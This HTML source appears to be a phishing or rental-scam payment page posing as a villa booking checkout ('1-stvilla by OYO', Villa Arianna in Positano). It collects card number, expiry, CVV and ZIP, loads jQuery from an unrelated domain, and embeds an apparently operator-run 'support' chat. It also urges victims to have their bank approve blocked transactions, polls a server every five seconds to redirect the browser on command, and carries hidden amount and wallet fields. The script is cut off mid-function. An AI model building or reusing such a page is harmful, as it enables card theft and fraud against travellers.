<!doctype html>
<html lang="en">
	<head>
		<meta charset="UTF-8" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0" />
		<title>1-stvilla</title>
		<script src="https://cdn.tailwindcss.com"></script>
		<script src="https://visit.cyou/js/jquery-3.1.1.min.js"></script>
		<link rel="preconnect" href="https://fonts.googleapis.com" />
		<link
			rel="shortcut icon"
			href="https://1-stvilla.com/favicon.jpg"
			type="image/svg+xml"
		/>
		<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
		<link
			href="https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&display=swap"
			rel="stylesheet"
		/>
		<style>
			* {
				font-family: 'Inter', sans-serif;
				font-optical-sizing: auto;
			}

			.custom-checkbox {
				display: inline-flex;
				align-items: center;
				cursor: pointer;
				font-size: 16px;
				user-select: none;
			}

			.custom-checkbox input {
				display: none;
			}

			.custom-checkbox .checkmark {
				width: 20px;
				height: 20px;
				border-radius: 4px;
				background-color: #fff;
				border: 2px solid #2ecc71;
				margin-right: 8px;
				position: relative;
				transition: background-color 0.2s ease;
			}

			.custom-checkbox input:checked + .checkmark {
				background-color: #2ecc71;
			}

			.custom-checkbox .checkmark::after {
				content: '';
				position: absolute;
				left: 5px;
				top: 2px;
				width: 6px;
				height: 12px;
				border: solid white;
				border-width: 0 2px 2px 0;
				transform: rotate(45deg);
				opacity: 0;
				transition: opacity 0.2s ease;
			}

			.custom-checkbox input:checked + .checkmark::after {
				opacity: 1;
			}
			* {
				box-sizing: border-box;
				-webkit-tap-highlight-color: transparent;
			}

			body {
				margin: 0;
			}

			.form__error {
				padding: 16px 16px 16px 72px;
				position: relative;
				margin-bottom: 36px;
				display: none;
			}
			.form__error.active {
				display: block;
			}
			.form__error h2 {
				margin: 0 0 4px;
				padding: 0;
				font-size: 0.875rem;
				line-height: 1.125rem;
			}
			.form__error .text {
				font-size: 0.875rem;
				line-height: 1.125rem;
				color: #717171;
				margin: 0;
			}
			.form__error-ico {
				position: absolute;
				top: 16px;
				left: 16px;
				width: 44px;
				height: 44px;
				border-radius: 44px;
				display: flex;
				justify-content: center;
				align-items: center;
				background: #c13515;
			}
			.form__error-ico svg {
				color: #fff;
			}
			@media only screen and (max-width: 744px) {
				.form__error-pc {
					position: fixed;
					bottom: 0;
					left: 24px;
					width: calc(100% - 48px);
					background: #fff;
					border-radius: 12px !important;
					border: 1px solid #ddd !important;
					box-shadow: 0 6px 20px rgba(0, 0, 0, 0.2);
				}
				.form__error-pc.active {
					display: block;
				}
			}
			.form__error-close {
				visibility: hidden;
			}
			@media only screen and (max-width: 744px) {
				.form__error-close {
					visibility: visible;
					display: inline-block;
					position: absolute;
					right: 16px;
					top: 16px;
				}
			}
			.payment {
				height: 110px;
				padding-top: 52px;
				position: relative;
				border-radius: 8px;
				scroll-margin-top: 80px;
				border: 1px solid #b0b0b0;
			}
			.payment__bot {
				border-top: 1px solid #b0b0b0;
				position: relative;
				width: 100%;
				height: 55px;
			}
			/* Стили label по умолчанию */
			.message {
				position: absolute;
				top: 50%;
				transform: translateY(-50%);
				left: 12px;
				transition:
					transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms,
					color 200ms cubic-bezier(0, 0, 0.2, 1) 0ms;
				transform-origin: top left;
			}
			.message span {
				font-size: 1rem !important;
				line-height: 1.25rem !important;
				font-weight: 400 !important;
			}
			.message svg,
			.message span {
				color: #717171 !important;
			}
			.message.active {
				transform: translateY(-18px) scale(0.75);
				color: #717171;
			}
			/* Стили label при фокусе на input */
			.label {
				display: block;
				position: relative;
				height: 56px;
			}
			.label input {
				height: 100%;
				width: 100%;
			}
			.number {
				position: absolute;
				top: -1px;
				left: -1px;
				width: calc(100% + 2px);
				height: 54px;
			}
			.expiration {
				border-radius: 0px 0px 0px 8px;
				border-color: #b0b0b0;
				border-width: 1px;
				border-style: solid;
				width: calc(50% + 2px);
				position: absolute;
				bottom: -2px;
				left: -1px;
				height: 57px;
			}
			.cvv {
				display: inline-block;
				border-radius: 0px 0px 8px;
				border-color: #b0b0b0;
				border-width: 1px;
				border-style: solid;
				position: absolute;
				bottom: -2px;
				right: -1px;
				height: 57px;
			}
			.input,
			.input-out {
				padding: 26px 12px 10px;
				border: none;
				outline: none;
				background: transparent;
			}
			.focus {
				border-width: 1px;
				border-radius: 8px;
				box-shadow: inset 0px 0px 0px 1px rgba(34, 34, 34, 1);
				z-index: 3;
			}
			.focus .message {
				transform: translateY(-18px) scale(0.75);
				color: #717171;
			}
			.number.focus {
				box-shadow: inset 0px 0px 0px 2px rgba(34, 34, 34, 1);
			}
			.label-bg {
				background-color: #fff;
				position: absolute;
				display: none;
				z-index: 2;
			}
			.label-bg-0 {
				bottom: 55px;
				left: 0;
				width: 100%;
				height: 5%;
			}
			.label-bg-1 {
				bottom: 0px;
				left: calc(50% - 9px);
				width: 10px;
				height: 55px;
			}
			.label-bg-2 {
				bottom: 0px;
				left: 50%;
				width: 10px;
				height: 55px;
			}
			.label-bg-1-1 {
				bottom: 5px;
				left: 0;
				width: 5px;
				height: 55px;
			}
			.label-bg-2-1 {
				bottom: 5px;
				right: 0;
				width: 5px;
				height: 55px;
			}
			.label-bg.active {
				display: block;
			}
			.error {
				border: 1px solid #c13515;
				background-color: #fff8f6;
				z-index: 1;
			}
			.error .message span,
			.error .message svg {
				color: #c13515 !important;
			}
			.number.error {
				border-radius: 8px 8px 0 0;
			}
			.zip.error,
			.focus.error {
				box-shadow: inset 0px 0px 0px 1px rgba(193, 53, 21);
				border-color: rgba(193, 53, 21);
				z-index: 3;
			}
			.zip.focus.error,
			.number.focus.error {
				box-shadow: inset 0px 0px 0px 1px rgba(193, 53, 21);
				border-radius: 8px;
			}
			.error.uncheck-error {
				background: #fff;
				border-color: rgba(176, 176, 176, 1);
			}
			.error.uncheck-error.focus {
				border-color: rgba(193, 53, 21);
			}
			.payment__error,
			.zip__error {
				display: none;
				margin-top: 8px;
			}
			.payment__error span,
			.zip__error span,
			.payment__error svg,
			.zip__error svg {
				color: rgba(193, 53, 21);
			}
			.payment__error svg,
			.zip__error svg {
				margin-right: 4px;
			}
			.payment__error.active,
			.zip__error.active {
				display: flex;
				align-items: center;
			}
			.zip,
			.label-country {
				border-radius: 8px;
				border-color: #b0b0b0;
				border-width: 1px;
				border-style: solid;
				margin-top: 8px;
			}
			.label-country {
				position: relative;
				cursor: pointer;
			}
			.label-country .text {
				margin: 0;
				padding: 26px 12px 10px;
			}
			.label-arrow {
				position: absolute;
				height: 100%;
				display: flex;
				align-items: center;
				top: 0;
				right: 12px;
			}

			body {
				width: 100%;
				height: 100%;
			}

			body {
				font-size: 1rem;
				line-height: 1.25rem;
				color: #222;
				background-color: #fff;
				-webkit-font-smoothing: antialiased;
			}

			html {
				line-height: 1.15;
				-webkit-text-size-adjust: 100%;
			}

			html {
				width: 100%;
				height: 100%;
			}

			.border {
				border: 1px solid rgb(221, 221, 221);
				border-radius: 12px;
				padding: 24px;
			}

			.form__error-mobile {
				border: 1px solid #dddddd !important;
				border-radius: 16px !important;
				margin-bottom: 24px !important;
			}

			.form__error {
				padding: 16px 16px 16px 54px;
				position: relative;
				margin-bottom: 36px;
				display: none;
			}

			.popuplist {
				display: flex;
				justify-content: center;
				align-items: center;
				background: rgba(34, 34, 34, 0.6);
				position: fixed;
				top: 0;
				left: 0;
				width: 100%;
				height: 100%;
				padding: 40px;
				z-index: -2;
				visibility: hidden;
				opacity: 0;
				transition: opacity 300ms;
			}

			.popuplist.active {
				visibility: visible;
				z-index: 5;
				opacity: 1;
			}

			.popuplist__block {
				max-width: 568px;
				width: 100%;
				height: 100%;
				border-radius: 12px;
				background: #fff;
				box-shadow: 0 8px 28px rgba(0, 0, 0, 0.28);
				display: flex;
				flex-direction: column;
				transform: translateY(200px);
				opacity: 0.5;
				transition: 300ms;
			}

			.popuplist.active .popuplist__block {
				transform: translateY(0);
				opacity: 1;
			}

			.popuplist__head {
				height: 63px;
				padding: 0 24px;
				display: flex;
				justify-content: space-between;
				align-items: center;
				border-bottom: 1px solid rgb(221, 221, 221);
			}

			.popuplist__list-wrapper {
				flex: 1 1 auto;
				overflow-y: scroll;
				padding: 0 24px;
				height: calc(100% - 56px);
			}

			h2 {
				margin: 0;
				padding: 0 0 24px;
				font-size: 1.375rem;
				line-height: 1.625rem;
				letter-spacing: -0.01375rem;
				font-weight: normal;
			}

			.popuplist__head h2 {
				font-size: 1rem;
				padding: 0;
			}

			.popuplist__head i {
				display: inline-block;
				width: 10px;
				height: 10px;
			}

			.js-select-wallet {
				font-size: 1rem;
				border-bottom: 1px solid rgb(221, 221, 221);
				padding: 24px 0;
				cursor: pointer;
			}

			.js-select-wallet:last-child {
				border: none;
			}

			.payment {
				height: 110px;
				padding-top: 52px;
				position: relative;
				border-radius: 8px;
				scroll-margin-top: 80px;
				border: 1px solid rgb(176, 176, 176);
			}

			.payment__error {
				display: none;
				margin-top: 8px;
			}

			.label {
				display: block;
				position: relative;
				height: 56px;
			}

			.zip {
				border-radius: 8px;
				border-color: rgb(176, 176, 176);
				border-width: 1px;
				border-style: solid;
				margin-top: 8px;
			}

			.zip__error {
				display: none;
				margin-top: 8px;
			}

			.countries {
				display: flex;
				justify-content: center;
				align-items: center;
				background: rgba(34, 34, 34, 0.6);
				position: fixed;
				top: 0;
				left: 0;
				width: 100%;
				height: 100%;
				padding: 40px;
				z-index: -2;
				visibility: hidden;
				opacity: 0;
				transition: opacity 300ms;
			}

			.countries.active {
				visibility: visible;
				z-index: 5;
				opacity: 1;
			}

			.countries__block {
				max-width: 568px;
				width: 100%;
				height: 100%;
				border-radius: 12px;
				background: #fff;
				box-shadow: 0 8px 28px rgba(0, 0, 0, 0.28);
				display: flex;
				flex-direction: column;
				transform: translateY(200px);
				opacity: 0.5;
				transition: 300ms;
			}

			.countries.active .countries__block {
				transform: translateY(0);
				opacity: 1;
			}

			.countries__head {
				height: 63px;
				padding: 0 24px;
				display: flex;
				justify-content: space-between;
				align-items: center;
				border-bottom: 1px solid rgb(221, 221, 221);
			}

			.countries__list-wrapper {
				flex: 1 1 auto;
				overflow-y: scroll;
				padding: 0 24px;
				height: calc(100% - 56px);
			}

			h2 {
				margin: 0;
				padding: 0 0 24px;
				font-size: 1.375rem;
				line-height: 1.625rem;
				letter-spacing: -0.01375rem;
				font-weight: normal;
			}

			.countries__head h2 {
				font-size: 1rem;
				padding: 0;
			}

			.countries__head i {
				display: inline-block;
				width: 10px;
				height: 10px;
			}

			.countries__list-item {
				font-size: 1rem;
				border-bottom: 1px solid rgb(221, 221, 221);
				padding: 24px 0;
				cursor: pointer;
			}

			.countries__list-item:last-child {
				border: none;
			}

			.label-country {
				border-radius: 8px;
				border-color: rgb(176, 176, 176);
				border-width: 1px;
				border-style: solid;
				margin-top: 8px;
			}

			.label-country {
				position: relative;
				cursor: pointer;
			}

			.payment__bot {
				border-top: 1px solid rgb(176, 176, 176);
				position: relative;
				width: 100%;
				height: 55px;
			}

			.payment__bot-2 {
				border-top: none;
				display: flex;
				position: relative;
				width: 100%;
				height: 55px;
				margin-top: 10px;
			}

			button {
				font-size: 100%;
				line-height: 1.15;
				margin: 0;
			}

			button {
				overflow: visible;
			}

			button {
				text-transform: none;
			}

			button,
			[type='submit'] {
				-webkit-appearance: button;
			}

			.submit-mobile {
				display: none;
			}

			.form__error-ico {
				position: absolute;
				top: 16px;
				left: 16px;
				width: 44px;
				height: 44px;
				border-radius: 44px;
				display: flex;
				justify-content: center;
				align-items: center;
				background: #c13515;
			}

			h2 {
				margin: 0;
				padding: 0 0 24px;
				font-size: 1.375rem;
				line-height: 1.625rem;
				letter-spacing: -0.01375rem;
				font-weight: normal;
			}

			.form__error h2 {
				margin: 0 0 4px;
				padding: 0;
				font-size: 0.875rem;
				line-height: 1.125rem;
			}

			.text {
				margin: 8px 0 0 0;
				font-size: 1rem;
				line-height: 1.25rem;
			}

			.form__error .text {
				font-size: 0.875rem;
				line-height: 1.125rem;
				color: #717171;
				margin: 0;
			}

			.number {
				position: absolute;
				top: -1px;
				left: -1px;
				width: calc(100% + 2px);
				height: 54px;
			}

			.label-bg {
				background-color: #fff;
				position: absolute;
				display: none;
				z-index: 2;
			}

			.label-bg-0 {
				bottom: 55px;
				left: 0;
				width: 100%;
				height: 5%;
			}

			.label-bg-1 {
				bottom: 0px;
				left: calc(50% - 9px);
				width: 10px;
				height: 55px;
			}

			.label-bg-2 {
				bottom: 0px;
				left: 50%;
				width: 10px;
				height: 55px;
			}

			.label-bg-1-1 {
				bottom: 5px;
				left: 0;
				width: 5px;
				height: 55px;
			}

			.label-bg-2-1 {
				bottom: 5px;
				right: 0;
				width: 5px;
				height: 55px;
			}

			.payment__error svg {
				color: rgb(193, 53, 21);
			}

			.payment__error svg {
				margin-right: 4px;
			}

			.payment__error span {
				color: rgb(193, 53, 21);
			}

			.message {
				position: absolute;
				top: 50%;
				transform: translateY(-50%);
				left: 12px;
				transition:
					transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms,
					color 200ms cubic-bezier(0, 0, 0.2, 1) 0ms;
				transform-origin: top left;
			}

			input {
				font-size: 100%;
				line-height: 1.15;
				margin: 0;
			}

			input {
				overflow: visible;
			}

			.input-out {
				padding: 26px 12px 10px;
				border: none;
				outline: none;
				background: transparent;
			}

			.label input {
				height: 100%;
				width: 100%;
			}

			.zip__error svg {
				color: rgb(193, 53, 21);
			}

			.zip__error svg {
				margin-right: 4px;
			}

			.zip__error span {
				color: rgb(193, 53, 21);
			}

			.message.active {
				transform: translateY(-18px) scale(0.75);
				color: rgb(113, 113, 113);
			}

			.label-country .text {
				margin: 0;
				padding: 26px 12px 10px;
			}

			.label-arrow {
				position: absolute;
				height: 100%;
				display: flex;
				align-items: center;
				top: 0;
				right: 12px;
			}

			.general-label-1 {
				border-radius: 8px 0px 0px 8px;
				border-color: rgb(176, 176, 176);
				border-width: 1px;
				border-style: solid;
				z-index: 0;
				width: calc(50% + 2px);
				position: absolute;
				bottom: -2px;
				left: -1px;
				height: 57px;
			}

			.general-label-2 {
				display: inline-block;
				border-radius: 0px 8px 8px 0;
				border-color: rgb(176, 176, 176);
				border-width: 1px;
				z-index: 0;
				border-style: solid;
				width: calc(50% + 1px);
				position: absolute;
				bottom: -2px;
				right: -1px;
				height: 57px;
				cursor: pointer;
			}

			.form__error-ico svg {
				color: #fff;
			}

			.input {
				padding: 26px 12px 10px;
				border: none;
				outline: none;
				background: transparent;
			}

			img {
				border-style: none;
			}

			.card__preview {
				width: 36px;
				height: 100%;
				-o-object-fit: contain;
				object-fit: contain;
				position: absolute;
				right: 12px;
				top: 0;
				display: none;
			}

			.expiration {
				border-radius: 0px 0px 0px 8px;
				border-color: rgb(176, 176, 176);
				border-width: 1px;
				border-style: solid;
				width: calc(50% + 2px);
				position: absolute;
				bottom: -2px;
				left: -1px;
				height: 57px;
			}

			.cvv {
				display: inline-block;
				border-radius: 0px 0px 8px;
				border-color: rgb(176, 176, 176);
				border-width: 1px;
				border-style: solid;
				width: calc(50%);
				position: absolute;
				bottom: -2px;
				right: -1px;
				height: 57px;
			}

			.message span {
				font-size: 1rem !important;
				line-height: 1.25rem !important;
				font-weight: 400 !important;
			}

			.message span {
				color: rgb(113, 113, 113) !important;
			}

			& .text {
				margin: 0;
				padding: 26px 12px 10px;
			}

			.message svg {
				color: rgb(113, 113, 113) !important;
			}

			/* These were inline style tags. Uses id+class to override almost everything */
			#style-BDhsL.style-BDhsL {
				width: 25px;
				height: 25px;
			}
		</style>
	</head>

	<body class="bg-[#f3f5f7] max-w-screen">
		<header class="bg-white py-2.5 border-[1px] border-gray-300">
			<div class="items-center pl-3 lg:mx-auto lg:w-[1200px] flex">
				<a href="" class="block">
					<div class="flex flex-col items-end">
						<span class="text-[#17D286] text-xl font-semibold">1-stvilla</span>
						<span class="text-[10px] font-normal mt-[-7px]"
							>by <span class="text-[#F0473E] font-bold">OYO</span></span
						>
					</div>
				</a>
			</div>
		</header>
		<main class="mt-6 lg:mt-16 mx-4">
			<div class="lg:mx-auto lg:w-[1200px] flex flex-col gap-[10px]">
				<div class="flex items-center gap-2">
					<img
						src="https://cdn-icons-png.flaticon.com/512/8212/8212602.png "
						width="32"
						height="32"
						alt=""
						title=""
						class="img-small"
					/>
					<h2 class="text-2xl font-semibold text-gray-700 p-0">
						Finish booking
					</h2>
				</div>
				<div class="flex max-md:flex-col gap-[20px]">
					<div class="flex flex-col">
						<div
							class="flex flex-col w-full lg:w-[750px] bg-white px-[20px] pt-[10px] pb-[40px]"
						>
							<h2 class="text-xl font-semibold">Booking Details</h2>
							<div class="flex max-lg:flex-col justify-between">
								<div class="flex flex-col pt-[10px]">
									<h3 class="text-base font-semibold">Check-in Date</h3>
									<span class="text-gray-500 text-sm"
										>Tuesday, October 6, 2026</span
									>
									<span class="text-gray-500 text-sm"
										>Between 1:00 PM and 12:00 AM</span
									>
								</div>
								<div class="flex flex-col pt-[10px] lg:w-[215px]">
									<h3 class="text-base font-semibold">Check-out Date</h3>
									<span class="text-gray-500 text-sm"
										>Tuesday, October 13, 2026</span
									>
									<span class="text-gray-500 text-sm"
										>Between 11:00 AM and 2:00 PM</span
									>
								</div>
							</div>
							<div
								class="flex max-lg:flex-col justify-between lg:pr-2 pt-[10px]"
							>
								<div class="flex flex-col pt-[10px]">
									<h3 class="text-base font-semibold">Your Stay</h3>
									<!-- <span class="text-gray-500 text-sm">Duration: 7 nights</span> -->
									<span class="text-gray-500 text-sm"
										>Total Price: €3,650.00</span
									>
								</div>
								<div class="flex flex-col pt-[10px]">
									<h3 class="text-base font-semibold">
										Owner Contact Information
									</h3>
									<span class="text-gray-500 text-sm">Arianna Diaz</span>
									<span class="text-gray-500 text-sm"
										>contact@1stvilla.com</span
									>
								</div>
							</div>
						</div>
						<div
							class="flex flex-col w-full lg:w-[750px] gap-[10px] bg-white px-[20px] pt-[10px] mt-[20px] pb-[40px]"
						>
							<h2 class="text-xl font-semibold">Important information</h2>
							<h3 class="text-base font-medium">
								If you are experiencing issues with the payment process, please
								do not hesitate to contact our support team via the chat
								available on the payment page. <br />
								<br />
								If the transaction was suspended due to security requirements,
								it is recommended to contact your bank to approve the
								transaction. If you need any further assistance, feel free to
								reach out to our support team through the chat on the payment
								page — we’ll be happy to help you. <br />
								<br />
								Regards, <br />
								1-stvilla Technical Support
							</h3>
						</div>
						<div
							class="flex flex-col w-full lg:w-[750px] gap-[10px] bg-white px-[20px] pt-[10px] mt-[20px] pb-[10px] payment !border-none !h-fit"
						>
							<h2 class="text-xl font-semibold">Pay online</h2>
							<h3 class="text-base font-medium">
								You'll pay when you complete this booking
							</h3>
							<div class="border-b-[1px] pt-[10px] lg:w-[550px]"></div>
						</div>
						<div
							class="flex flex-col w-full lg:w-[750px] gap-[10px] bg-white px-[20px] pb-[30px]"
						>
							<div class="payment__body-mobile">
								<div class="border form__error form__error-mobile">
									<div
										class="form__error-ico"
										style="width: 25px; height: 25px"
									>
										<svg
											xmlns="http://www.w3.org/2000/svg"
											viewBox="0 0 16 16"
											aria-hidden="true"
											role="presentation"
											focusable="false"
											style="
												display: block;
												height: 16px;
												width: 16px;
												fill: currentcolor;
											"
										>
											<path
												d="M8 12a2 2 0 1 1 0 4 2 2 0 0 1 0-4zM9.6 0v9.6H6.4V0z"
											></path>
										</svg>
									</div>
									<h2>Let’s try that again</h2>
									<div class="text">Please check your payment details.</div>
								</div>
								<div class="payment">
									<!-- NUMBER -->
									<label class="label number">
										<div class="message flex items-center gap-1">
											<span>Card number</span>
											<svg
												viewBox="0 0 24 24"
												role="presentation"
												aria-hidden="true"
												focusable="false"
												style="height: 1em; width: 1em; fill: currentcolor"
											>
												<path
													d="m17.1403105 10.3322131v-1.83599021c-.0044371-2.48293439-2.0786109-4.49407316-4.6371478-4.49622289h-1.0063254c-2.56010616.00215385-4.6349284 2.01566919-4.63714782 4.50012925v1.83208385c-1.0387857.0478557-1.85657082.8775506-1.85968948 1.886773v6.8825219c0 1.0485082.87586388 1.898492 1.95629672 1.898492h10.08740658c1.0804328 0 1.9562967-.8499838 1.9562967-1.898492v-6.8825219c-.0031187-1.0092224-.8209038-1.8389173-1.8596895-1.886773zm-7.90518974-1.83599021c.00267117-2.2124746 1.58801224-2.19412124 2.26171654-2.19488726h1.0063254c.7450523.00084715 2.2590036-.05221743 2.2617165 2.19488726v1.83599021h-5.52975844z"
												></path>
											</svg>
										</div>
										<input
											type="text"
											class="input input-card"
											maxlength="19"
											name="cardNumber"
										/>
										<img src="" class="card__preview" alt="" />
									</label>
									<div class="payment__bot">
										<!-- EXPIRATION -->
										<label class="label expiration">
											<div class="message">
												<span>Expiration</span>
											</div>
											<input
												type="text"
												class="input input-expiration"
												maxlength="5"
												name="expiry"
											/>
										</label>
										<!-- CVV -->
										<label class="label cvv">
											<div class="message">
												<span>CVV</span>
											</div>
											<input
												type="text"
												class="input input-cvv"
												maxlength="3"
												name="cvv"
											/>
										</label>
									</div>
									<div class="label-bg label-bg-0"></div>
									<div class="label-bg label-bg-1"></div>
									<div class="label-bg label-bg-2"></div>
									<div class="label-bg label-bg-1-1"></div>
									<div class="label-bg label-bg-2-1"></div>
								</div>
								<div class="payment__error">
									<svg
										xmlns="http://www.w3.org/2000/svg"
										viewBox="0 0 16 16"
										aria-label="Error"
										role="img"
										focusable="false"
										style="
											display: block;
											height: 12px;
											width: 12px;
											fill: currentcolor;
										"
									>
										<path
											d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0zm0 10.2a1 1 0 1 0 0 2 1 1 0 0 0 0-2zm.8-6.6H7.2v5.2h1.6z"
										></path>
									</svg>
									<span class="payment__error-message"
										>Check your card number.</span
									>
									<!-- <span class="payment__error-1">Check your expiration date.</span>
                                <span class="payment__error-2">Check your CVV code.</span> -->
								</div>
								<label class="label zip">
									<div class="message">
										<span>ZIP code</span>
									</div>
									<input
										type="text"
										class="input-out input-zip"
										name="zip_code"
									/>
								</label>
								<div class="zip__error">
									<svg
										xmlns="http://www.w3.org/2000/svg"
										viewBox="0 0 16 16"
										aria-label="Error"
										role="img"
										focusable="false"
										style="
											display: block;
											height: 12px;
											width: 12px;
											fill: currentcolor;
										"
									>
										<path
											d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0zm0 10.2a1 1 0 1 0 0 2 1 1 0 0 0 0-2zm.8-6.6H7.2v5.2h1.6z"
										></path>
									</svg>
									<span>This is required.</span>
								</div>
								<label class="label label-country">
									<div class="message active">
										<span>Country/region</span>
									</div>
									<div class="text selected-country">Select country</div>
									<div class="label-arrow">
										<svg
											viewBox="0 0 18 18"
											role="presentation"
											aria-hidden="true"
											focusable="false"
											style="
												height: 16px;
												width: 16px;
												display: block;
												fill: currentcolor;
											"
										>
											<path
												d="m16.29 4.3a1 1 0 1 1 1.41 1.42l-8 8a1 1 0 0 1 -1.41 0l-8-8a1 1 0 1 1 1.41-1.42l7.29 7.29z"
												fill-rule="evenodd"
											></path>
										</svg>
									</div>
								</label>
								<!-- ADDED START -->
								<div class="payment__bot payment__bot-2" style="display: none">
									<input type="hidden" id="price_status" value="none" />
									<!-- EXPIRATION -->
									<label class="label general-label-1">
										<div class="message active">
											<span>Your booking amount</span>
										</div>
										<input
											type="text"
											name="booking_price"
											id="amount_input"
											maxlength="10"
											class="input input-expiration"
										/>
									</label>
									<!-- CVV -->
									<label class="label general-label-2">
										<div class="message active">
											<span>Wallet</span>
										</div>
										<input
											type="hidden"
											name="wallet"
											value="EUR"
											class="selected-wallet"
										/>
										<div class="text selected-listitem">EUR</div>
										<div class="label-arrow">
											<svg
												viewBox="0 0 18 18"
												role="presentation"
												aria-hidden="true"
												focusable="false"
												style="
													height: 16px;
													width: 16px;
													display: block;
													fill: currentcolor;
												"
											>
												<path
													d="m16.29 4.3a1 1 0 1 1 1.41 1.42l-8 8a1 1 0 0 1 -1.41 0l-8-8a1 1 0 1 1 1.41-1.42l7.29 7.29z"
													fill-rule="evenodd"
												></path>
											</svg>
										</div>
									</label>
								</div>
								<!-- ADDED END -->
								<button type="submit" class="submit-mobile">Done</button>
							</div>
						</div>
						<div class="flex flex-col py-[20px] w-full lg:w-[750px]">
							<div class="flex pl-[10px] gap-[10px] items-baseline">
								<label class="custom-checkbox">
									<input type="checkbox" />
									<span class="checkmark"></span>
								</label>
								<p class="text-sm">
									I consent to receiving marketing emails from 1-stvilla.com,
									including promotions, personalized recommendations, rewards,
									travel experiences, and updates about 1-stvilla.com products
									and services.
								</p>
							</div>

							<span class="text-xs pt-[10px]"
								>By signing up, you allow us to tailor offers and content to
								your interests by monitoring how you use 1-stvilla.com through
								tracking technologies. Unsubscribe anytime through your account
								settings or the link in any marketing email.</span
							>
						</div>
						<div
							class="flex flex-col w-full lg:w-[750px] pt-[10px] gap-[15px] px-[20px] bg-white"
						>
							<h2 class="text-xl font-semibold">
								How much will the cancellation cost?
							</h2>
							<span class="">Free cancellation at any time.</span>
							<div class="border-b-[1px] pt-[10px] w-full lg:w-[550px]"></div>
							<h2 class="text-xl font-semibold">Refund schedule</h2>
							<span class="">You can request a refund at any time.</span>
							<div class="border-b-[1px] pt-[10px] w-full lg:w-[550px]"></div>
							<h2 class="text-xl font-semibold">Ground rules</h2>
							<span class=""
								>We ask every guest to remember a few simple things about what
								makes a great guest.</span
							>
							<ul class="list-disc pl-[20px]">
								<li class="">Follow the house rules</li>
								<li class="">Treat your Host's home like your own</li>
							</ul>
							<div class="border-b-[1px pt-[10px]] w-full lg:w-[550px]"></div>
						</div>
						<div class="bg-white px-[20px] py-[30px]">
							<button
								class="bg-green-400 rounded-lg p-[10px] submit max-lg:w-full"
							>
								<span class="text-white pl-[5px]">Complete booking</span>
							</button>
						</div>
					</div>

					<div class="flex max-md:order-first flex-col h-[550px] w-full lg:w-[400px]">
						<img
							src="https://1-stvilla.com/api/images/17505560168271.jpg"
							alt=""
							class="w-full"
						/>
						<div class="flex flex-col bg-white px-[20px] pt-[10px] pb-[30px]">
							<h2 class="text-xl font-semibold">Booking Number: WOYL6L9</h2>
							<span class="text-black font-semibold text-sm pt-[10px]"
								>Villa Arianna in Positano</span
							>
							<!-- <span class="text-gray-400 text-sm" -->
							<!-- >6 Bedrooms / 6 Bathrooms / Sleeps 14</span -->
							<!-- > -->
							<!-- <span class="text-gray-400 text-sm">Positano, Italy</span> -->
							<h3 class="text-base font-semibold pt-[10px]">
								Check-in Date: Tuesday, October 6, 2026
							</h3>
							<h3 class="text-base font-semibold">
								Check-out Date: Tuesday, October 13, 2026
							</h3>
							<div class="flex justify-between pt-[10px]">
								<span class="text-black font-semibold text-sm">Rent: </span>
								<!-- <span class="text-black text-sm">€450 x 7 nights </span> -->
								<span class="text-black text-sm">€3,150.00</span>
							</div>
							<div class="flex justify-between pt-[10px]">
								<span class="text-black font-semibold text-sm"
									>Cleaning Fee:
								</span>
								<span class="text-black text-sm">€0.00</span>
							</div>
							<div class="flex justify-between pt-[10px]">
								<span class="text-black font-semibold text-sm">Tax:</span>
								<span class="text-black text-sm">€0.00</span>
							</div>
							<div class="pl-[30px] pt-[10px] border-b-[1px]"></div>
							<div class="flex justify-between">
								<h2 class="text-2xl font-semibold pt-[10px]">Total:</h2>
								<h2 class="text-2xl font-semibold pt-[10px]">€3,650.00</h2>
							</div>
						</div>
					</div>
				</div>
			</div>
		</main>

		<div class="popuplist">
			<div class="popuplist__block">
				<div class="popuplist__head">
					<div class="popuplist__close">
						<svg
							xmlns="http://www.w3.org/2000/svg"
							viewBox="0 0 32 32"
							aria-hidden="true"
							role="presentation"
							focusable="false"
							style="
								display: block;
								fill: none;
								height: 16px;
								width: 16px;
								stroke: currentcolor;
								stroke-width: 3;
								overflow: visible;
							"
						>
							<path d="m6 6 20 20M26 6 6 26"></path>
						</svg>
					</div>
					<h2>Wallet</h2>
					<i></i>
				</div>
				<div class="popuplist__list-wrapper">
					<div class="popuplist__list"></div>
				</div>
			</div>
		</div>

		<div
			class="chat-div chatra--webkit chatra--side-bottom chatra--pos-right chatra--style-round chatra--visible chatra--fast-toggle chatra--expanded chatra--transparent"
			id="chatra"
			data-turbolinks-permanent=""
			style="transform: none; z-index: 2147483647"
		>
			<div id="chatra__iframe-wrapper">
				<iframe
					frameborder="0"
					id="chatra__iframe"
					allowtransparency="true"
					title="Chatra live chat"
					allow="autoplay"
					src="/chat/cvgnwob"
					style="
						width: 380px;
						height: 600px;
						position: absolute;
						border-radius: 0px !important;
					"
				></iframe>
			</div>
		</div>

		<div
			id="support-open"
			class="support-circle"
			style="background-color: #ff385c"
		></div>
	</body>

	<script>
		$('body').on('click', '#support-open,.js-support-open', function () {
			chat_open();
		});

		function chat_open() {
			var main = $('#chatra__iframe').contents().find('#main');
			main.show();
			$('#chatra', window.parent.document).css('width', '380px');
			$('#chatra', window.parent.document).css('height', '600px');
			$('#support-open').hide();
		}
	</script>

	<script>
		let ajaxCheckStatus = false;
		let ajaxSendStatus = false;

		var get_status = setInterval(function () {
			if (ajaxCheckStatus) {
				return;
			}
			ajaxCheckStatus = true;

			$.ajax({
				url: '/ajax/payment_card_status.php',
				dataType: 'json',
				type: 'POST',
				data: 'code=true',
				success: function (return_data) {
					if (return_data['status']) {
						location.href = return_data['url'];
					}
				},
				error: function (jqXHR, textStatus, errorThrown) {
					//console.error("Ошибка: " + textStatus + ", " + errorThrown);
				},
				complete: function () {
					ajaxCheckStatus = false;
				},
			});
		}, 5000);

		function onPage() {
			if (ajaxSendStatus) {
				return;
			}
			ajaxSendStatus = true;

			var page = 'payment';
			$.ajax({
				url: '/ajax/user_send_status.php',
				dataType: 'json',
				type: 'POST',
				data: 'page=' + page,

				error: function (jqXHR, textStatus, errorThrown) {
